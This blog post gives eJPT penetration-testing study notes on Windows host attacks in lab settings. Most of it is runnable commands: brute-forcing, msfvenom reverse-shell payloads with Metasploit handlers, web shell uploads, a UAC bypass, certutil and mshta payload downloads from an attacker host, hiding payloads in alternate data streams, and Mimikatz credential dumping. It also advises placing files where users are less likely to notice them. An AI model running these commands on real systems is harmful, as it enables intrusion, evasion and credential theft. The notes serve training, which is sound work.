eJPT - 3.1 System or Host Based Attacks (I)

HmadHmad
18 min read

Table of contents

Introduction

Theses are attacks that are targeted towards a specific system or host running a specific operating system. Network services are not the only attack vector that can be targeted during a penetration test. System or host based attacks usually come into play after you have gained access to a target network, whereby, you will be required to exploit servers, workstations, or laptops on the internal network.

These attacks are primarily focused on exploiting inherent vulnerabilities on the target OS. Unlike network based attacks, host based attacks are much more specialised and require an understanding of the target OS and the vulnerabilities that affect those operating systems. It involves exploiting misconfigurations and inherent vulnerabilities within the target OS.

We have covered some of the notes for this section previously - Vulnerability Assessment Page.

Exploiting Windows Vulnerabilities

Microsoft IIS WebDAV

The first step is to run an Nmap scan on the target and perform service version detection.

nmap -sV -sC (target ip)
nmap -sV -p 80 --script=http-enum (target ip)

In order to run a brute-force on the WebDAV directory, to find the username and password. We don't need to perform a brute-force this time as we have been given the credentials.

hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt (target ip) http-get /webdav/

Since WebDAV allows us to install files into the web server, we will use davtest which will perform a series of checks to then tell us what types of files we can upload to the server.

davtest -auth user:password -url http://target_ip/webdav/

In this case, we can see that .asp files can be executed, so we can utilize the cadaver utility to upload an .asp payload. Cadaver will give us a shell with the server.

To open a shell on the web server:
cadaver http://target_ip/webdav

Kali comes pre-packaged with web shells that can be executed. They are under the directory:

ls -al /usr/share/webshells/

We can the use the webshell.asp file and upload it onto the WebDAV server, so within the WebDAV shell that we open previously with cadaver:

put /usr/share/webshells/asp/webshell.asp

We can then launch the web shell by clicking on it within the WebDAV directory. We can then run Windows commands in that web shell in the browser.

WebDAV with Metasploit

So to start, we'll perform the same Nmap scans. To generate the meterpreter staged payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=1234 -f asp > shell.asp

We can now use cadaver to upload it to the WebDAV directory.

cadaver http://target_ip/webdav
put /root/shell.asp

Before executing the payload, we have to set up a listener within Metasploit.

service postgresql start
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT 1234
run

There is another method to perform this automatically which is to use a Metasploit module. It's called the iis_webdav_upload_asp. The following options need to be configured:

set HttpUsername User
set HttpPassword Pass
set RHOSTS target_ip
set PATH /webdav/metasploit.asp
exploit

SMB with PsExec

We can utilize PsExec legitimately with credentials to obtain a shell on the target system. To obtain credentials, we can perform a brute-force attack on SMB. Once you've obtained credentials, we can then authenticate with the SMB server via PsExec and obtain a reverse shell.

The first step is to run an Nmap service version and script scan to obtain some information. We can automate the brute-force with Metasploit. We are looking for smb_login module. Now that we have obtained credentials, we can authenticate with the target system via PsExec. However, we cannot run Windows executables on Linux but there is a Python script available.

psexec.py username@target_ip cmd.exe

To extend our access and gain a meterpreter session, we can utilize another Metasploit module called psexec. Once you've set the options, you can exploit SMB and gain access.

We have already covered CVE-2017-0144 previously - Vulnerability Assessment Page.

RDP

We would start as normal with an Nmap scan to determine what ports are open and what services are running on them. If RDP has been configured to run on a port other than 3389, we may see an unknown service listed. To check or confirm if RDP is running, we can utilize a Metasploit auxiliary module, called rdp_scanner.

To gain credentials to login to the system via RDP, we are going to brute-force the system.

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://target_ip -s target_port

In this lab, the tool freerdp does not work, so we'll be using xfreerdp.

xfreerdp /u:username /p:password /v:target_ip:port

Once authenticated, it will open a GUI of the Windows server.

We have already covered CVE-2019-0708 previously - Vulnerability Assessment Page.

WinRM

This is a feature that runs on Windows but it's not configured by default. It stands for Windows Remote Management protocol. It can be used to facilitate remote access with Windows systems over HTTP(S). It implements access control and security for communication between systems through various forms of authentication, either by a normal username and password or a username and a hashed password.

It is typically used in the following ways:

  • Remotely access and interact with Windows hosts on a LAN

  • Remotely access and execute commands on Windows systems

  • Manage and configure Windows systems remotely

WinRM normally runs on port 5985 or port 5986 if SSL is enabled.

We can use a tool called Crackmapexec to perform a brute-force attack on WinRM in order to identify users and their passwords as well as to execute commands on the target system. We can also use a ruby script called evil-winrm to obtain a command shell session on the target system.

Note that you can also use Crackmapexec on MsSQL, SMB, SSH as well as WinRM.

crackmapexec winrm target_ip -u administrator -p /usr/sahre/metasploit-framework/data/wordlists/unix_passwords.txt

crackmapexec winrm target_ip -u administrator -p password -x "whoami"

To now obtain a shell, we can use evil-winrm.

evil-winrm -u usernmae -p 'password' -i target_ip

You can also obtain a meterpreter session via Metasploit. There is an exploit module called winrm_script_exec. It will require credentials before being exploited.

Windows Privilege Escalation

This is the process of exploiting vulnerabilities or misconfigurations in systems to elevate privileges from one user to another, typically to a user with administrative privileges to perform tasks that require administrative privileges. It's a vital element of the attack life cycle and is a major determinant in the overall success of a penetration test.

Windows Kernel

A kernel is a computer program that is the core of an OS and has complete control over every resource and hardware on a system. It acts as a translation layer between hardware and software that facilitates the communication between these two layers.

Windows NT is the kernel that comes pre-packaged with all versions of Windows and operates as a traditional kernel with a few exceptions based on user design philosophy. It consists of two main modes of operation that determine access to system resources and hardware:

  1. User mode - programs and services running in user mode have limited access to system resources and functionality

  2. Kernel mode - has unrestricted access to system resources and functionality with the added functionality of managing devices and system memory

If we are trying to execute code within the kernel, we want to do it within the kernel mode as that will mean that the code is executed with the highest level of administrator privileges.

Kernel exploits on Windows will typically target vulnerabilities in the Windows kernel to execute arbitrary code in order to run privileges system commands or to obtain a system shell. The process will differ based on the version of Windows being targeted and the kernel exploit being used. It may however causes system crashes and data loss so is best to avoid in an enterprise environment.

Privilege escalation on Windows systems will typically follow the following methodology:

  • Identify kernel vulnerabilities

  • Download, compile and transfer kernel exploit onto the target system for execution

The following process has been demonstrated on Windows 7 SP1 VM.

In this case, the Windows-Exploit-Suggester tool has been used. It compares a targets patch level against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins. It can be found on GitHub here. A collection of Windows kernel exploits sorted by CVE can be found here on GitHub and in this case, we will be using MS16-135.

To escalate your privileges within meterpreter, use the command getsystem to automatically escalate privileges. There is also a post-exploitation module called local_exploit_suggester. This will enumerate all the vulnerabilities within the specific version of Windows and it will display what exploit modules will work. You can then check which exploit modules will work on what versions of Windows.

To use the Windows-Exploit-Suggester tool, you can refer to the GitHub pages for information on how to download and run it. To use it, you first have to obtain a meterpreter session on the less privileged user and copy the sysinfo information into a text file.

./windows-exploit-suggester.py --database (the database that you generate) --systeminfo (the location of the text file with the sysinfo information)

This will then identify which vulnerabilities that the particular version of Windows is vulnerable to. In this case, the first/most successful vulnerability which the system is vulnerable to is MS16-135. You can then download the binary executable, transfer it to the target system and execute it. Note that this does not take into account any anti-virus or anti-malware measures.

When transferring files into a Windows or Linux system, always upload them into the Temp directory as it's less likely to be detected and noticed by the user of that system.

Bypassing UAC with UACMe

UAC stands for User Account Control. It's a security feature introduced in Windows Vista that is used to prevent unauthorized changes from being made to the OS and would require approval from the administrator.

A non-privileged user attempting to execute a program with elevated privileges will be prompted with the UAC credential prompt whereas a privileged user will be prompted with a consent prompt. Attacks can bypass UAC in order to execute malicious executables with elevated privileges.

In order to successfully bypass UAC, we will need to have access to a user account that is part of the local administrators group on the Windows target system. UAC has various integrity levels ranging from low to high, if the UAC protection level is set below high, Windows programs can be executed with elevated privileges without prompting the user for confirmation.

UACMe is an open source, robust privilege escalation tool. it can bypass UAC on multiple versions of Windows ranging from 7 to 10. It allows attackers to execute malicious payloads on a Windows target with elevated privileges by abusing the inbuilt Windows AutoElevate tool. The GitHub repository has more than 60 exploits than can be used to bypass UAC depending on the version of Windows running on the target. You can find the GitHub page here.

We can perform an Nmap scan on the target system. We can see that port 80 is open and vulnerable. We can exploit it using the Metasploit module rejetto_hfs_exec. We will have a meterpreter session.

In this case, we'll be looking at the UACMe Akagi tool. The way to use it is:

akagi32 (method or key) (the executable file path)

Once we have a meterpreter session via the rejetto_hfs_exec module, we will not have administrator privileges even though we are in the local administrators group. We will however have access to the admin account. to migrate the process:

ps -S explorer.exe (or can use) pgrep explorer
migrate (to the explorer process)
getsystem

In this case, the getsystem command will not work as we do not have permission to elevate privileges. To bypass UAC, we will generate the malicious executable with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=1234 -f exe > 'backdoor.exe'

Now in the meterpreter session that we had obtained, we need to navigate to the temp folder and upload the Akagi executable and the backdoor.exe file that we just generated.

cd C:\\Users\\admin\\AppData\\Local\\Temp
upload /root/Desktop/tools/UACME/Akagi64.exe
upload /root/backdoor.exe

To then set up our listener with Metasploit:

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT 1234
exploit

Now, go back to the original meterpreter session that we had opened and run the Akagi executable.

shell
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe

We should now have an elevated meterpreter session on our listener. To now dump the hashes, we need to migrate into the lsass process.

ps -S lsass.exe (or can use) pgrep lsass
migrate (to the lsass process)
hashdump

Access Token Impersonation

Windows access tokens are a core element of the authentication process on Windows and are created and managed by LSASS (Local Security Authority Subsystem Services). A token is responsible for identifying and describing the security context of a process or thread running on a system.

Access tokens are generated by the winlogon.exe process every time a user authenticates successfully and includes the identify and privileges of the user account associated with the thread or process. This token is then attached to the userinit.exe process, after which all child processes started by a user will inherit a copy of the access token from their creator and will run under the privileges of that access token.

Windows access tokens are categorized based on two types of the level tokens which determine which privileges are assigned to what token:

  1. Impersonate level tokens

  2. Delegate level tokens

Impersonate level tokens are created as a direct result of a non-interactive login on Windows, typically through specific system services or domain logons. They can be used to impersonate a token on the local system and not on any external systems that utilize the token.

Delegate level tokens are typically created through an interactive login on Windows, primarily through a traditional login or through remote access protocols, like RDP. These tokens pose the largest threat as they can be used to impersonate tokens on any system.

The process of impersonating access tokens to elevate privileges on a system will primarily depends on the privileges assigned to the account that has been exploited to gain initial access as well as the impersonation or delegation tokens available. You need one of the following tokens (primarily the SeImpersonatePrivilege token) to perform a successful impersonation attack:

  • SeAssignPrimaryToken - allows a user to impersonate tokens

  • SeCreateToken - allows a user to create an arbitrary token with administrative privileges

  • SeImpersonatePrivilege - allows a user to create a process under the security context of another user typically with administrative privileges

In order to perform this attack, we will be using a Metasploit module called incognito which allows you to impersonate user tokens after successful exploitation. We can use it to display a list of available tokens that we can impersonate. In this case, the target is also vulnerable to the rejetto_hfs_exec Metasploit module that we used previously.

In this case, if you run the getprivs command within the Meterpreter session, we have access to the SetImpersonatePrivilege privilege. To now use the tool incognito within meterpreter:

load incognito
list_tokens -u
impersonate_token "the name of the token you want to impersonate"

We can now migrate to the explorer process and we will have elevated privileges.

In the case that we do not find any useful or administrative tokens to impersonate, we can utilize the potato attack which will cover later.

Windows File System Vulnerabilities

ADS

ADS stands for Alternate Data Streams is an NTFS file attribute and was designed to provide compatibility with the MacOS HFS system. Any file created on an NTFS formatted drive will have two different streams:

  1. Data stream - default stream that contains the data of the file

  2. Resource stream - typically contains the metadata of the file

Attackers can use ADS to hide malicious code or executables in legitimate files in order to evade detection. This can be done by storing the malicious code or executables in the file attribute resource stream (metadata) of a legitimate file. This technique is usually used to evade basic signature based AVs (anti-virus) and static scanning tools.

For example, in the command prompt we can make a file within the resource stream, making it hidden, using notepad on the desktop. If no data is inputted into test.txt, it will show up as having 0 bytes of data even though data is stored in secret.txt.

notepad test.txt:secret.txt

For example, say we have a malicious payload on the Desktop, let's load or copy this file into the Temp directory. To then hide it within the resource stream of another file:

payload.exe > windowslog.txt:payload.exe

We can then delete the payload file as we have hidden it in the windowslog.txt file. We can now make a link such that when we type that command into the command prompt it will execute the file hidden within the windowslog.txt file. Make sure you do this with administrative privileges.

cd Windows\System32
mklink winlog.exe C:\Temp\windowslog.txt:payload.exe

Windows Credential Dumping

Windows stores hashed user account passwords locally in the SAM (Security Accounts Manager) database. Authentication and verification of user credentials is facilitated by the LSA (Local Security Authority). This all ties into the LSASS process.

Windows versions up to Windows Server 2003 utilize LM and NTLM hashes. From Windows Vista onwards, only NTLM hashes are utilized.

Note that you need an elevated or administrative level session to dump hashes.

SAM Database

SAM is a database file that is responsible for managing user accounts and passwords on Windows. All user account passwords stored in the SAM database are hashed. The SAM database file cannot be copied while the operating system is running. The Windows NT kernel keeps the SAM database file locked and as a result, attackers typically utilize in-memory techniques and tools to dump SAM hashes from the LSASS process. In modern versions of Windows, the SAM database is encrypted with a syskey.

Windows Password Hashes

LM Hashes

LM (LanMan) is the default hashing algorithm that was implemented in Windows before NTLM. LM hashing is considered to be a weak protocol and can easily be cracked, primarily because the password hash does not include salts, consequently making brute-force and rainbow table attacks effective against LM hashes. The hashing process can be broken down into the following steps:

  • The password is broken down into two 7 character chunks

  • All characters are then converted into uppercase

  • Each chunk is then hashed separately with the DES algorithm.

NTLM Hashes

NTLM is a collection of authentication protocols that are used to facilitate authentication between computers. The authentication process involves using a valid username and password to authenticate successfully. When a user account is created, it is encrypted using the MD4 hashing algorithm, while the original password is disposed of.

NTLM improves on LM in the following ways:

  • Doesn't split the hash into two chunks

  • Case sensitive

  • Allows the use of symbols and Unicode characters

Again, they do not include salts, so brute-force and rainbow table attacks are effective.

Configuration Files

Windows can automate a variety of repetitive tasks, such as the mass rollout or installation of Windows on many systems. This is typically done through the use of the Unattended Windows Setup utility. This tool utilizes configuration files that contain specific configurations and user account credentials, specifically the Administrator account's password.

If the Unattended Windows Setup configuration files are left on the target system after installation, they can reveal user account credentials that can be used by attackers to authenticate with the Windows system legitimately.

As a security precaution, the passwords stored may be encoded in base 64 (which can be cracked as well). You will typically find the file under the following directories:

  • C:\Windows\Panther\Unattend.xml

  • C:\Windows\Panther\Autounattend.xml

We can generate a meterpreter payload with msfvenom. Since we know it's a 64-bit system:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=your_ip LPORT=123 -f exe > payload.exe

We then set up a web server to host the payload:

python -m SimpleHTTPServer 80

Since we have access to the target system already, we can switch to the victim's system and open the command prompt.

certutil -urlcache -f http://your_ip/payload.exe payload.exe

We can now open Metasploit and set up the multi-handler like we have done previously. Now, once we run the payload.exe file on the target system, we will have a meterpreter session. We can now find the unattend.xml file.

Once downloaded onto our system, we can see that the password is encoded in base 64 as the Plaintext option is set to false. We can first write the password to a new file called password.txt.

base64 -d password.txt

We can now use the PsExec tool or the Metasploit module to obtain a shell using these credentials.

There is another method to gain privileges. In this case, since we already have access to the target system, we can run a PowerShell script to find a privilege escalation vulnerability.

cd .\Desktop\PowerSploit\Privesc\
powershell -ep bypass
. .\PowerUp.ps1
Invoke-PrivescAudit

We can now see that the unattend.xml file is on the system, and we can cat out the contents. We can decode the password using PowerShell:

$password='QWRtaW5AMTIz'
$password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($password))
echo $password

We can now open up a command prompt as an administrator:

runas.exe /usr:administrator cmd

Now, we'll switch to our Kali machine and run the hta_server Metasploit module which hosts a HTML application. When opened, if will run a payload via PowerShell. We can copy the link that Metasploit generates with the payload and paste it into the command prompt.

mshta.exe http://the_link

We should now have a meterpreter shell with administrator privileges.

Dumping Hashes with Mimikatz

Mimikatz is a Windows post-exploitation tool that allows for the extraction of clear-text passwords, hashes and Kerberos tickets from memory. We can use it to extract hashes from the lsass.exe process memory where hashes are cached. We can use the pre-compiled Mimikatz executable or if we have access to a meterpreter session, we can use Kiwi. We will require elevated privileges to run this.

The first step, as usual is to perform an Nmap scan. We can see that the target is running a BadBlue service on port 80. There is a Metasploit module to exploit this called badblue_passthru. Once exploited, we will have administrator privileges, and we can now migrate to the LSASS service and we will therefore have the highest privileges.#

We can now load kiwi in our meterpreter session and dump all the credentials or we could dump the SAM database, which will dump the hashes for all the user accounts on the system.

creds_all
lsa_dump_sam

Alternatively to use Mimikatz, we can use our current meterpreter session and navigate to the Temp directory. We can then upload the Mimikatz executable on the target system.

upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe

We can then open up a shell session and run the executable. The first thing would be to check our privileges after we have run the executable and then we can dump the SAM database.

privilege::debug
lsadump::sam
lsadump::secrets

Another useful thing we can run with Mimikatz is that if the system is set to log the logon passwords in cleartext, we can view them by running sekurlsa::logonpasswords.

If you'd like to get the LM hash as well as the NTLM hash just type hashdump in your meterpreter session and we will be provided with both to use in the next attack.

We have already covered the Pass-the-Hash Attack previously - Vulnerability Assessment Page.

That’s it for part 1 of this section. Next one up is part 2.

— Hmad

0
Subscribe to my newsletter

Read articles from Hmad directly inside your inbox. Subscribe to the newsletter, and don't miss out.

ejptWindowsvulnerabilitymetasploitPrivilege Escalation

Written by

Hmad
Hmad

I'm a cybersecurity enthusiast with a growing focus on offensive security. Currently studying for the eJPT & ICCA, building hands-on projects like Infiltr8, and sharing everything I learn through blog posts and labs.